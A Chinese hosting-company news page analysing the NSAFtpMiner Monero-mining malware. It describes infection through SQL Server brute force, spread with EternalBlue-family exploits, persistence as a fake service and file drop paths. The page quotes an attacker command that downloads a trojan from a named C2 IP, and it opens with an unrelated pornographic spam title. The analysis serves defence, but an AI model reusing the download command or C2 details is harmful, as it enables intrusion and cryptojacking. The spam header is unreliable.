激情五月天婷婷,亚洲愉拍一区二区三区,日韩视频一区,a√天堂中文官网8

<ul id="buwfs"><strike id="buwfs"><strong id="buwfs"></strong></strike></ul>
    <output id="buwfs"></output>
  • <dfn id="buwfs"><source id="buwfs"></source></dfn>
      <dfn id="buwfs"><td id="buwfs"></td></dfn>
      <div id="buwfs"><small id="buwfs"></small></div>
      <dfn id="buwfs"><source id="buwfs"></source></dfn>
      1. <dfn id="buwfs"><td id="buwfs"></td></dfn>
        億恩科技有限公司旗下門戶資訊平臺!
        服務器租用 4元建網(wǎng)站

        問題:NSAFtpMiner礦工,win1ogins.exe挖礦病毒,介紹,原理,處理。

        cpu跑到100%,服務器非???,基本操作不了,所有提供服務無法正常運行。

        中毒表現(xiàn):

        1,cpu跑到100%,服務器非???,基本操作不了,所有提供服務無法正常運行。

        2,進程中有win1ogins.exe,中間是數(shù)字1 不是字母l.描述是cpu挖礦。右鍵無法打開文件位置。

        3,斷網(wǎng)情況下無法挖礦,CPU占用回下來。

        問題:NSAFtpMiner礦工,win1ogins.exe挖礦病毒,介紹,原理,處理。

        使用360掃描殺毒,可以發(fā)現(xiàn)釋放文件help.dll

        原理:黑客通過1433端口爆破入侵SQL Server服務器,再植入遠程控制木馬并安裝為系統(tǒng)服務,然后利用遠程控制木馬進一步加載挖礦木馬進行挖礦。

        NSAFtpMiner攻擊流程

        1433爆破手礦工(NSAFtpMiner)有如下特點:

        1.利用密碼字典爆破1433端口登錄;

        2.木馬偽裝成系統(tǒng)服務,COPY自身到c:\windows\svchost.exe,創(chuàng)建服務“Server Remote”;

        3.利用NSA武器庫工具包掃描入侵內(nèi)網(wǎng)開放445/139端口的計算機;

        4.使用了NSA武器中的多個工具包Eternalblue(永恒之藍)、Doubleplsar(雙脈沖星)、EternalChampion(永恒冠軍)、Eternalromance(永恒浪漫)、Esteemaudit(RDP漏洞攻擊);

        5.遠程控制木馬創(chuàng)建“FTP系統(tǒng)核心服務”,提供FTP服務,供內(nèi)網(wǎng)其他被入侵的電腦進行病毒庫更新;

        6.下載挖礦程序在局域網(wǎng)組網(wǎng)挖取門羅幣。

        黑客針對1433端口爆破成功后在受害機器執(zhí)行命令:

        “C:\Windows\System32\WScript.exe” “C:\ProgramData\vget.vbs” hxxp://221.229.204.120:7423/clem.exe C:/ProgramData/clem.exe
        將遠程控制木馬植入。

        clem.exe運行后拷貝自身到C:\windows\svchost.exe,并創(chuàng)建服務“Server Remote”。

        連接C2地址221.229.204.120:

        遠程控制木馬clem.exe接收指令下載NSA攻擊模塊主程序ru.exe,ru.exe運行后在C:\Program Files\Windowsd 釋放72個子文件。

        黑客攻擊時先關(guān)閉防火墻,然后啟動Fileftp.exe掃描內(nèi)網(wǎng)機器的445/139端口,如果端口處于打開狀態(tài)則利用多個NSA武器工具(Eternalblue等)對目標機器進行攻擊。若攻擊成功,則根據(jù)不同系統(tǒng)版本在受害機器上執(zhí)行payload(x86/x64.dll),x86/x64.dll執(zhí)行后釋放出runsum.exe并安裝執(zhí)行,runsum.exe功能同最初的遠程控制模塊clem.exe相同,接收指令下載挖礦模塊和NSA攻擊模塊進行挖礦攻擊和繼續(xù)感染。

        使用kill.bat、Pkill.dll對攻擊進程進行清除。

        遠程控制木馬clem.exe下載挖礦模塊xxs.exe,xxs.exe運行后釋放help.dll到C:\Windows\Fonts\sysIntl。

        help.dll釋放礦機程序win1ogins.exe到以下目錄:

        C:\Windows\Help\

        C:\Windows\PLA\system\

        C:\Windows\Fonts\system(x64)\

        C:\Windows\Fonts\system(x86)\

        C:\Windwos\dell\

        win1ogins.exe采用開源挖礦程序xmrig編譯 啟動礦機程序挖礦門羅幣
        河南億恩科技股份有限公司(mszdt.com)始創(chuàng)于2000年,專注服務器托管租用,是國家工信部認定的綜合電信服務運營商。億恩為近五十萬的用戶提供服務器托管、服務器租用、機柜租用、云服務器、網(wǎng)站建設、網(wǎng)站托管等網(wǎng)絡基礎(chǔ)服務,另有網(wǎng)總管、名片俠網(wǎng)絡推廣服務,使得客戶不斷的獲得更大的收益。
        服務器/云主機 24小時售后服務電話:0371-60135900
        虛擬主機/智能建站 24小時售后服務電話:0371-55621053
        網(wǎng)絡版權(quán)侵權(quán)舉報電話:0371-60135995
        服務熱線:0371-60135900

        標簽 服務器
        1
        0
        分享到:責任編輯:會會

        相關(guān)推介

        共有:0條評論網(wǎng)友評論:

        驗證碼 看不清換一張 換一張

        親,還沒評論呢!速度搶沙發(fā)吧!